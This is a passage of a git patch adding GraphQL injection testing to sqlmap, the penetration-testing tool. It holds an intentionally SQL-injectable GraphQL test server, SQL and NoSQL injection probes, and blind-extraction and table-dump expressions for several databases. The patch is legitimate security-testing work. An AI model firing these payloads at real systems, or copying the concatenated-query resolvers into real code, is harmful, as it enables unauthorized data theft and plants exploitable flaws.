From f6912fc921cd310bd259bba1df8d8d134a702bfd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Miroslav=20=C5=A0tampar?= Date: Sat, 27 Jun 2026 19:23:30 +0200 Subject: [PATCH] Adding support for GraphQL (--graphql) --- data/txt/sha256sums.txt | 17 +- extra/vulnserver/vulnserver.py | 255 ++++++ lib/controller/checks.py | 8 + lib/controller/controller.py | 13 + lib/core/optiondict.py | 1 + lib/core/settings.py | 64 +- lib/core/testing.py | 1 + lib/parse/cmdline.py | 3 + lib/techniques/graphql/__init__.py | 8 + lib/techniques/graphql/inject.py | 1165 ++++++++++++++++++++++++++++ tests/test_graphql.py | 680 ++++++++++++++++ 11 files changed, 2207 insertions(+), 8 deletions(-) create mode 100644 lib/techniques/graphql/__init__.py create mode 100644 lib/techniques/graphql/inject.py create mode 100644 tests/test_graphql.py diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt index eecb2bff2..c27f6cf1b 100644 --- a/data/txt/sha256sums.txt +++ b/data/txt/sha256sums.txt @@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/ df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh 1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py -43214ecb0101bce72eb243c91b90db34693ebfd485d6c111a4ae22591ff7800b extra/vulnserver/vulnserver.py +faaaa586baa4df245b8780a1a808ebf07e3027ce4245ded3274d908c49e1eecd extra/vulnserver/vulnserver.py a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py -0c6433b289094d37f295238699042a34a6ab950bb3d11f74fe9a83d30bb7f4bd lib/controller/checks.py -ea0fdf6bcda59aae4d093bada965654a0cd940227c2dbdf62b6ded79baa8dfad lib/controller/controller.py +284b5b056f048e5951c43605965f6758cb9cefa54ca30d818b2c1d1c6713fb91 lib/controller/checks.py +b1e89bff221cc907f5033bae941bf7929de9490f5dcdf2747cba676acd2da95b lib/controller/controller.py d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py 9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py @@ -181,7 +181,7 @@ f8de57606325456928e46ae2896f5f8bbec9ad18b1c644b492a566fa992216f6 lib/core/decor 5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py 914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py -056930fba3cf9827f97d280bc38ac785c93108eb84c922f5f39723bb04dcf403 lib/core/optiondict.py +1b03686e1aa916ccad3cd86b8e4e6ea4baca5e30e05bf86a56f8df8dd4f44ba6 lib/core/optiondict.py 4e7f2ad3d2866093aa195616a0e93de1687406edc0b9038fbfa76bf1c9c174b2 lib/core/option.py ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch.py 49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py @@ -189,18 +189,18 @@ ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch 9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py 0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py -ca14e55b4d49a9b9f4e547180828030e4fcc51176dc9036879dbdae05919dd02 lib/core/settings.py +7032c06dba29cfc35330e022823b778aa87849d5e92a33f4daff2a364d0c9ecd lib/core/settings.py c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py 19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py -e453904a50372216b09146ad9f11cdced2323c10f49c3d866238cc044dcb2cce lib/core/testing.py +b63a8c4caed56796010e9b438ae6b4c398d4c4ed48d74b0a1a270302e0ce87ca lib/core/testing.py 95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py 53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py 2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py 54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py -223badcfd102cdf3313411b63d09b6c59599d58dfc40d27409b1bfa2efc1aa8f lib/parse/cmdline.py +c515041ee2d50aded9afa371de47c3c44c81b30546fb1f6f170b2169ae5e64b4 lib/parse/cmdline.py 02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py 5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py @@ -239,6 +239,8 @@ a66a4b9df6207dce722c9b71d290ea426723cb4b697b416065dc7dd5db96fe8e lib/techniques 74ca78082dcd20b3faf07cc944cd65ea552996df40e6fb58d0a011b262528456 lib/techniques/dns/use.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/error/__init__.py 5bbef46c16e34fd80e3f9f0e9aa255ce2e39be0d0e57479e25890b041c7efc7d lib/techniques/error/use.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/graphql/__init__.py +a1c5ec208843eb93e0fab40daac090aa3bf914a7dd0afb0f7c55c2db4db8d72b lib/techniques/graphql/inject.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py 44401cad3e39ae9fb899ed5d0e2fdd0879561de05c3117f17f3b0db54f4e3724 lib/techniques/nosql/__init__.py d62b28bf9f1544e65a1017994402f484166f4d64a1efb724351b15e27b851990 lib/techniques/nosql/inject.py @@ -594,6 +596,7 @@ ed5a0e453b811dc3dcc5ca28e14a9d7552aacaa7e316e1bca1b042dc5939e204 tests/test_dns 9cd5841349bc4db818658d12184929a96f7f279eff1f53ad18a54dbefbd6b276 tests/test_dump_jsonl.py 2bbe4b01f79992cfa8884651fc0a28dbd0e3abb0cbea9eb7eadf1f98ca3c3420 tests/test_encoding.py bb6991260a994fcbe79e05febaa34affd5631d02299fbc626820addd5f6ea4f4 tests/test_error_engine.py +4a5f9392b7fec7b40c4d865b83306b58b76f3423cebc2876e6e75fb91b037202 tests/test_graphql.py 8105de9978fe286a29f6b635a58db1e9998d86e8dded54d7efdfb9d52a121094 tests/test_hashdb.py c04e8358fb6df45f69f2f26435c971acde280535bf304e84d30cf2681158c6a7 tests/test_hash.py d539d0ae758b5bb91e314ab82ab4fe03d6fb2f8b377d16aefa6d7d1d77a7d5a9 tests/test_identifiers_output.py diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py index 25e4bb3a9..c13a95526 100644 --- a/extra/vulnserver/vulnserver.py +++ b/extra/vulnserver/vulnserver.py @@ -246,6 +246,232 @@ def waf_score(value, ua=None, level=0): retVal += WAF_SCANNER_UA_WEIGHT return retVal +# --- GraphQL endpoint (vulnerable Apollo-style, backed by the same SQLite database) ---------- + +# Hard-coded introspection response matching the schema below. Every GraphQL tool (including +# sqlmap's --graphql engine) uses this to discover fields, arguments, and types. +def _graphql_introspection(): + return { + "data": { + "__schema": { + "queryType": {"name": "Query"}, + "mutationType": {"name": "Mutation"}, + "subscriptionType": None, + "directives": [], + "types": [ + {"kind": "OBJECT", "name": "Query", "fields": [ + {"name": "user", "args": [ + {"name": "username", "defaultValue": None, "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}} + ], "type": {"kind": "OBJECT", "name": "User", "ofType": None}}, + {"name": "search", "args": [ + {"name": "term", "defaultValue": None, "type": {"kind": "SCALAR", "name": "String", "ofType": None}} + ], "type": {"kind": "LIST", "name": None, "ofType": {"kind": "OBJECT", "name": "User", "ofType": None}}}, + {"name": "login", "args": [ + {"name": "username", "defaultValue": None, "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}}, + {"name": "password", "defaultValue": None, "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}} + ], "type": {"kind": "OBJECT", "name": "AuthPayload", "ofType": None}}, + ], "inputFields": None, "enumValues": None}, + {"kind": "OBJECT", "name": "Mutation", "fields": [ + {"name": "updateUser", "args": [ + {"name": "id", "defaultValue": None, "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "Int", "ofType": None}}}, + {"name": "email", "defaultValue": None, "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}} + ], "type": {"kind": "OBJECT", "name": "User", "ofType": None}}, + ], "inputFields": None, "enumValues": None}, + {"kind": "INPUT_OBJECT", "name": "UpdateUserInput", "inputFields": [ + {"name": "id", "defaultValue": None, "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "Int", "ofType": None}}}, + {"name": "email", "defaultValue": None, "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}} + ]}, + {"kind": "SCALAR", "name": "Int"}, + {"kind": "SCALAR", "name": "String"}, + {"kind": "SCALAR", "name": "Boolean"}, + {"kind": "SCALAR", "name": "Float"}, + {"kind": "SCALAR", "name": "ID"}, + {"kind": "OBJECT", "name": "User", "fields": [ + {"name": "id", "args": [], "type": {"kind": "SCALAR", "name": "Int", "ofType": None}}, + {"name": "name", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": None}}, + {"name": "surname", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": None}}, + ], "inputFields": None, "enumValues": None}, + {"kind": "OBJECT", "name": "AuthPayload", "fields": [ + {"name": "token", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": None}}, + {"name": "user", "args": [], "type": {"kind": "OBJECT", "name": "User", "ofType": None}}, + ], "inputFields": None, "enumValues": None}, + ] + } + } + } + + +def _graphql_arg(raw): + """Parse a single GraphQL argument value: strip quotes from strings, keep numbers as-is""" + raw = raw.strip() + if raw.startswith('"') and raw.endswith('"'): + return raw[1:-1].replace('\\"', '"') + return raw + + +def _graphql_match(text, start): + """Index just past the bracket matching the one at text[start] ('(' or '{'), skipping over + double-quoted strings so brackets inside argument literals (e.g. an injected SQL payload) and + nested selection sets do not throw off the balance.""" + + pairs = {'(': ')', '{': '}'} + opener, closer = text[start], pairs[text[start]] + depth, i, n = 0, start, len(text) + while i < n: + char = text[i] + if char == '"': + i += 1 + while i < n and text[i] != '"': + i += 2 if text[i] == '\\' else 1 + elif char == opener: + depth += 1 + elif char == closer: + depth -= 1 + if depth == 0: + return i + 1 + i += 1 + return n + + +def _graphql_selections(body): + """Split a selection set into its top-level (alias, field, rawArgs) fields, tolerating aliasing, + argument literals carrying brackets/quotes, and nested selection sets (which are skipped over).""" + + identifier = re.compile(r'[A-Za-z_]\w*') + selections, i, n = [], 0, len(body) + while i < n: + while i < n and body[i] in ' \t\r\n,': + i += 1 + match = identifier.match(body, i) + if not match: + i += 1 + continue + name, i = match.group(0), match.end() + + j = i + while j < n and body[j] in ' \t\r\n': + j += 1 + if j < n and body[j] == ':': # 'name' was an alias; the real field follows + j += 1 + while j < n and body[j] in ' \t\r\n': + j += 1 + match = identifier.match(body, j) + if not match: + continue + alias, field, i = name, match.group(0), match.end() + else: + alias, field = None, name + + while i < n and body[i] in ' \t\r\n': + i += 1 + rawArgs = "" + if i < n and body[i] == '(': + end = _graphql_match(body, i) + rawArgs, i = body[i + 1:end - 1], end + + while i < n and body[i] in ' \t\r\n': + i += 1 + if i < n and body[i] == '{': # skip this field's (possibly nested) selection set + i = _graphql_match(body, i) + + selections.append((alias, field, rawArgs)) + return selections + + +def _graphql_resolve(query, variables): + """Minimal GraphQL resolver: parse the query, call the matching resolver for each top-level field, + and return (data_dict_or_None, errors_list). Multiple aliased fields are supported in one request + (alias:field(args){...} ...), so a client can batch independent probes into a single round-trip.""" + + variables = variables or {} + errors = [] + data = {} + + op = "query" + for keyword in ("mutation", "subscription"): + if query.strip().startswith(keyword): + op = keyword + break + + start = query.find('{') + if start == -1: + errors.append({"message": "Cannot parse query", "extensions": {"code": "GRAPHQL_PARSE_FAILED"}}) + return None, errors + + for alias, field, rawArgs in _graphql_selections(query[start + 1:_graphql_match(query, start) - 1]): + key = alias or field + + # Parse arguments + args = {} + for am in re.finditer(r'(\w+)\s*:\s*("(?:[^"\\]|\\.)*"|\$?\w+(?:\.\w+)?)', rawArgs): + name, val = am.group(1), am.group(2) + if val.startswith('$'): + args[name] = variables.get(val[1:], None) + else: + args[name] = _graphql_arg(val) + + try: + if field in ("__typename", "__schema"): + data[key] = op.title() + elif field == "user": + data[key] = _resolver_user(args.get("username")) + elif field == "search": + data[key] = _resolver_search(args.get("term")) + elif field == "login": + data[key] = _resolver_login(args.get("username"), args.get("password")) + elif field == "updateUser": + data[key] = _resolver_updateUser(args.get("id"), args.get("email")) + else: + errors.append({"message": "Cannot query field '%s' on type '%s'. Did you mean 'user', 'search', 'login', or 'updateUser'?" % (field, op.title()), + "extensions": {"code": "GRAPHQL_VALIDATION_FAILED"}}) + except Exception as ex: + # Leak the backend error through the GraphQL error envelope (as many real servers do + # in development mode) -- this drives error-based detection + errors.append({"message": "%s: %s" % (re.search(r"'([^']+)'", str(type(ex))).group(1), ex), + "path": [key], "extensions": {"exception": str(ex)}}) + + if not data and not errors: + return None, errors + return data, errors + + +# --- Vulnerable resolvers (direct string concatenation into SQLite) ------------------------ + +def _resolver_user(username): + if not username: + return None + with _lock: + _cursor.execute("SELECT id, name, surname FROM users WHERE name='%s'" % username) + row = _cursor.fetchone() + return {"id": row[0], "name": row[1], "surname": row[2]} if row else None + + +def _resolver_search(term): + with _lock: + _cursor.execute("SELECT id, name, surname FROM users WHERE name LIKE '%%%s%%'" % (term or "")) + rows = _cursor.fetchall() + return [{"id": r[0], "name": r[1], "surname": r[2]} for r in (rows or [])] + + +def _resolver_login(username, password): + if not username or not password: + return None + with _lock: + _cursor.execute("SELECT u.id, u.name, u.surname FROM users u JOIN creds c ON u.id=c.user_id WHERE u.name='%s' AND c.password_hash='%s'" % (username, password)) + row = _cursor.fetchone() + if row: + return {"token": "tok_%d_%s" % (row[0], row[1]), "user": {"id": row[0], "name": row[1], "surname": row[2]}} + return None # returns null in data (boolean oracle: true=object, false=null) + + +def _resolver_updateUser(id_, email): + with _lock: + _cursor.execute("UPDATE users SET surname='%s' WHERE id=%s" % (email, id_)) + _cursor.execute("SELECT id, name, surname FROM users WHERE id=%s" % id_) + row = _cursor.fetchone() + return {"id": row[0], "name": row[1], "surname": row[2]} if row else None + + class ReqHandler(BaseHTTPRequestHandler): def do_REQUEST(self): path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "") @@ -339,6 +565,35 @@ class ReqHandler(BaseHTTPRequestHandler): self.wfile.write(output.encode(UNICODE_ENCODING)) return + if self.url == "/graphql": + self.send_response(OK) + self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING) + self.send_header("Connection", "close") + self.end_headers() + + query = self.params.get("query", "") + variables = self.params.get("variables") or {} + + if not isinstance(variables, dict): + try: + variables = json.loads(str(variables)) + except Exception: + variables = {} + + if "__schema" in query: + output = json.dumps(_graphql_introspection()) + else: + data, errors = _graphql_resolve(query, variables) + resp = {} + if errors: + resp["errors"] = errors + if data: + resp["data"] = data + output = json.dumps(resp, default=str) + + self.wfile.write(output.encode(UNICODE_ENCODING)) + return + if self.url == '/': if not any(_ in self.params for _ in ("id", "query")): self.send_response(OK) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 128b4123d..6a9fa8d34 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -79,6 +79,7 @@ from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX from lib.core.settings import FI_ERROR_REGEX from lib.core.settings import FORMAT_EXCEPTION_STRINGS +from lib.core.settings import GRAPHQL_ERROR_REGEX from lib.core.settings import HEURISTIC_CHECK_ALPHABET from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import IPS_WAF_CHECK_PAYLOAD @@ -1178,6 +1179,13 @@ def heuristicCheckSqlInjection(place, parameter): if conf.beep: beep() + if not conf.graphql and re.search(GRAPHQL_ERROR_REGEX, page or ""): + infoMsg = "heuristic (GraphQL) test shows that %sparameter '%s' appears to be a GraphQL endpoint (rerun with switch '--graphql')" % ("%s " % paramType if paramType != parameter else "", parameter) + logger.info(infoMsg) + + if conf.beep: + beep() + kb.disableHtmlDecoding = False kb.heuristicMode = False diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 328575376..7b5b0dff3 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -504,8 +504,21 @@ def start(): infoMsg = "testing URL '%s'" % targetUrl logger.info(infoMsg) + if conf.graphql and PLACE.GET not in conf.parameters: + # graphqlScan() is self-contained and operates on the GraphQL + # document, not on HTTP parameters. A dummy GET parameter keeps + # _setRequestParams() from appending the URI injection marker ('*') + # to a bare endpoint URL (which would break detection under + # '--batch'); it is discarded by graphqlScan() on entry. + conf.parameters[PLACE.GET] = "x" + setupTargetEnv() + if conf.graphql: + from lib.techniques.graphql.inject import graphqlScan + graphqlScan() + continue + if not checkConnection(suppressOutput=conf.forms): continue diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index ffb03d3fe..42c187c89 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -119,6 +119,7 @@ optDict = { "Techniques": { "technique": "string", "nosql": "boolean", + "graphql": "boolean", "timeSec": "integer", "uCols": "string", "uChar": "string", diff --git a/lib/core/settings.py b/lib/core/settings.py index 6ad6cb33d..ec1d36c15 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from thirdparty import six # sqlmap version (...) -VERSION = "1.10.6.160" +VERSION = "1.10.6.161" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -877,6 +877,68 @@ NOSQL_MAX_RECORDS = 100 # Upper bound for the length search during NoSQL blind extraction NOSQL_MAX_LENGTH = 1024 +# GraphQL endpoint paths to probe when the user supplies a base URL with --graphql (no explicit /graphql) +GRAPHQL_ENDPOINT_PATHS = ("/graphql", "/api/graphql", "/v1/graphql", "/graphql/api", "/graph", "/gql") + +# Canonical GraphQL introspection query (the one everyone copy-pastes). Returned schema carries the +# full type system: query/mutation/subscription roots, OBJECT/INPUT_OBJECT/ENUM/SCALAR types, their +# fields/arguments/inputFields with type chains, directives, and deprecation metadata. +GRAPHQL_INTROSPECTION_QUERY = """query IntrospectionForSqlmap { + __schema { + queryType { name } + mutationType { name } + subscriptionType { name } + directives { name args { name type { kind name ofType { kind name ofType { kind name } } } } } + types { + kind + name + fields(includeDeprecated: true) { + name + args { + name + defaultValue + type { kind name ofType { kind name ofType { kind name ofType { kind name } } } } + } + type { kind name ofType { kind name ofType { kind name } } } + } + inputFields { + name + defaultValue + type { kind name ofType { kind name ofType { kind name ofType { kind name } } } } + } + enumValues(includeDeprecated: true) { name } + specifiedByURL + } + } +}""" + +# GraphQL error patterns that identify the response as originating from a GraphQL layer (parse, +# validation, execution, or APQ errors). Used by the heuristic in checks.py and for error-based +# detection inside the GraphQL engine. +GRAPHQL_PARSE_ERRORS = ( + r'"code"\s*:\s*"GRAPHQL_PARSE_FAILED"', + r"\bSyntax Error:\s*[^\"]", + r"\bExpected Name,\s*found\b", + r"\bUnexpected\s+\b", +) +GRAPHQL_VALIDATION_ERRORS = ( + r'"code"\s*:\s*"GRAPHQL_VALIDATION_FAILED"', + r"\bCannot query field\s+\"[^\"]+\"\s+on type\s+\"[^\"]+\"", + r"\bUnknown argument\s+\"[^\"]+\"\s+on field\s+\"[^\"]+\"", + r"\bField\s+\"[^\"]+\"\s+argument\s+\"[^\"]+\"\s+of type\s+\"[^\"]+\"\s+is required\b", + r"\bVariable\s+\"\$[^\"]+\"\s+got invalid value\b", + r"\bExpected type\s+[^,]+,\s*found\b", + r"\bDid you mean\s+\"[^\"]+\"\b", +) +GRAPHQL_APQ_ERRORS = ( + r"\bPersistedQueryNotFound\b", + r"\bPersistedQueryNotSupported\b", +) +GRAPHQL_RUNTIME_ERRORS = ( + r"\bGraphQL\s+(?:resolver\s+)?error\b", +) +GRAPHQL_ERROR_REGEX = "(?:%s)" % '|'.join(GRAPHQL_PARSE_ERRORS + GRAPHQL_VALIDATION_ERRORS + GRAPHQL_APQ_ERRORS + GRAPHQL_RUNTIME_ERRORS) + # Length of prefix and suffix used in non-SQLI heuristic checks NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 diff --git a/lib/core/testing.py b/lib/core/testing.py index 0d9a084e7..d727f8cbf 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -89,6 +89,7 @@ def vulnTest(): ("-u -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [30]", "nameisnull")), ("-u \"&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)), ("-u \"nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction + ("-u \"graphql\" --graphql --flush-session", ("found GraphQL endpoint", "introspection returned", "skipping 2 mutation slot", "GraphQL boolean-based blind", "in-band data exposure", "back-end DBMS: 'SQLite'", "banner: '3.", "available tables [2]: users, creds", "dumped table 'creds'", "db3a16990a0008a3b04707fdef6584a0", "graphql scan complete")), # GraphQL: endpoint detection + introspection + mutation-skip + boolean-blind/in-band + back-end fingerprint + batched blind dump of an injection-only table (SQLite-backed) ("-u \"&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), ("-d \"\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")), ("-d \"\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)), diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index c6e4205ab..42f67f7bc 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -418,6 +418,9 @@ def cmdLineParser(argv=None): techniques.add_argument("--nosql", dest="nosql", action="store_true", help="Test for NoSQL injection (e.g. MongoDB, CouchDB, Neo4j)") + techniques.add_argument("--graphql", dest="graphql", action="store_true", + help="Test for GraphQL injection (introspection, field/argument fuzzing, SQL/NoSQL payload families)") + techniques.add_argument("--time-sec", dest="timeSec", type=int, help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec) diff --git a/lib/techniques/graphql/__init__.py b/lib/techniques/graphql/__init__.py new file mode 100644 index 000000000..bcac84163 --- /dev/null +++ b/lib/techniques/graphql/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/lib/techniques/graphql/inject.py b/lib/techniques/graphql/inject.py new file mode 100644 index 000000000..f240443d0 --- /dev/null +++ b/lib/techniques/graphql/inject.py @@ -0,0 +1,1165 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import difflib +import json +import re +import time + +from collections import namedtuple +from collections import OrderedDict + +from lib.core.common import randomStr +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import POST_HINT +from lib.core.settings import ERROR_PARSING_REGEXES +from lib.core.settings import GRAPHQL_ENDPOINT_PATHS +from lib.core.settings import GRAPHQL_ERROR_REGEX +from lib.core.settings import GRAPHQL_INTROSPECTION_QUERY +from lib.core.settings import NOSQL_ERROR_REGEX +from lib.core.settings import UPPER_RATIO_BOUND +from lib.request.connect import Connect as Request +from lib.utils.xrange import xrange + +# Improbable literal used to build always-true/never-match payloads. Randomized per run (like +# NOSQL_SENTINEL) so it never becomes a static signature a WAF can pin a blocking rule on. +SENTINEL = randomStr(length=10, lowercase=True) + +# Maximum characters recovered for a single blind-inferred scalar (banner, user, table list, ...) +MAX_LENGTH = 1024 + +# Higher ceiling for a whole-table dump (its rows are concatenated into one scalar before extraction) +DUMP_MAX_LENGTH = 8192 + +# Printable-ASCII codepoint bounds for blind character inference +CHAR_MIN = 0x20 +CHAR_MAX = 0x7e + +# Number of independent predicates packed into a single aliased GraphQL document (batched inference) +BATCH_SIZE = 40 + +# Column/row separators woven into a GROUP_CONCAT/STRING_AGG table dump (printable, improbable in data) +COL_SEP = "~~~" +ROW_SEP = "^^^" + +# GraphQL scalar types mapped to injection strategy (None = skip) +SCALAR_STRATEGY = { + "String": "string", + "ID": "id_dual", + "Int": "numeric", + "Float": "numeric", +} + +# SQL error-inducing payloads (probe for backend DBMS leakage through the GraphQL errors envelope) +_SQL_ERROR_PAYLOADS = ("'", "''", "'\"", "')", "1') OR ('1'='1") + +# Preliminary SQL boolean-blind probes +_SQL_BOOLEAN_TRUE = "' OR '1'='1" +_SQL_BOOLEAN_FALSE = "' AND '1'='2" + +# NoSQL operator probes (for NoSQL-backed GraphQL resolvers) +_NOSQL_NE = '{"$ne": null}' +_NOSQL_IN = '{"$in": ["%s"]}' % SENTINEL + +# Minimum content difference for a boolean oracle to be considered reliable +_MIN_RATIO_DIFF = 0.15 + +# Cache for INPUT_OBJECT field definitions, populated during schema walks +_inputFields = {} + + +# --- Backend SQL dialect table ---------------------------------------------- + +# Per-DBMS building blocks for blind inference and enumeration, driven by the boolean/time oracle +# established on a slot. `fingerprint` is a predicate true only on that back-end (it errors -> falsy +# elsewhere). `length`/`ordinal` render a scalar-extraction sub-expression. `delay` wraps a condition +# in an inline conditional sleep (None where the engine offers none, e.g. SQLite). `banner`/ +# `currentUser`/`currentDb`/`tables` are generic enumeration scalars; `columns`/`rows` build the +# per-table column list and a single-scalar dump of every row (cells joined COL_SEP, rows ROW_SEP). +Dialect = namedtuple("Dialect", ("fingerprint", "length", "ordinal", "delay", + "banner", "currentUser", "currentDb", + "tables", "columns", "rows")) + + +def _sqliteRows(columns, table): + cells = ["COALESCE(CAST(%s AS TEXT),'NULL')" % _ for _ in columns] + body = ("||'%s'||" % COL_SEP).join(cells) + return "(SELECT GROUP_CONCAT(%s,'%s') FROM %s)" % (body, ROW_SEP, table) + + +def _mysqlRows(columns, table): + cells = ["COALESCE(CAST(%s AS CHAR),'NULL')" % _ for _ in columns] + body = "CONCAT_WS('%s',%s)" % (COL_SEP, ",".join(cells)) + return "(SELECT GROUP_CONCAT(%s SEPARATOR '%s') FROM %s)" % (body, ROW_SEP, table) + + +def _pgsqlRows(columns, table): + cells = ["COALESCE(CAST(%s AS TEXT),'NULL')" % _ for _ in columns] + body = ("||'%s'||" % COL_SEP).join(cells) + return "(SELECT STRING_AGG(%s,'%s') FROM %s)" % (body, ROW_SEP, table) + + +def _mssqlRows(columns, table): + cells = ["COALESCE(CAST(%s AS VARCHAR(MAX)),'NULL')" % _ for _ in columns] + body = ("+'%s'+" % COL_SEP).join(cells) + return "(SELECT STRING_AGG(%s,'%s') FROM %s)" % (body, ROW_SEP, table) + + +DIALECTS = OrderedDict(( + ("SQLite", Dialect( + fingerprint="SQLITE_VERSION() IS NOT NULL", + length=lambda expr: "LENGTH((%s))" % expr, + ordinal=lambda expr, pos: "UNICODE(SUBSTR((%s),%d,1))" % (expr, pos), + delay=None, + banner="SQLITE_VERSION()", + currentUser=None, + currentDb=None, + tables="(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%')", + columns=lambda table: "(SELECT GROUP_CONCAT(name) FROM pragma_table_info('%s'))" % table, + rows=_sqliteRows)), + ("Microsoft SQL Server", Dialect( + fingerprint="@@VERSION LIKE '%Microsoft%'", + length=lambda expr: "LEN((%s))" % expr, + ordinal=lambda expr, pos: 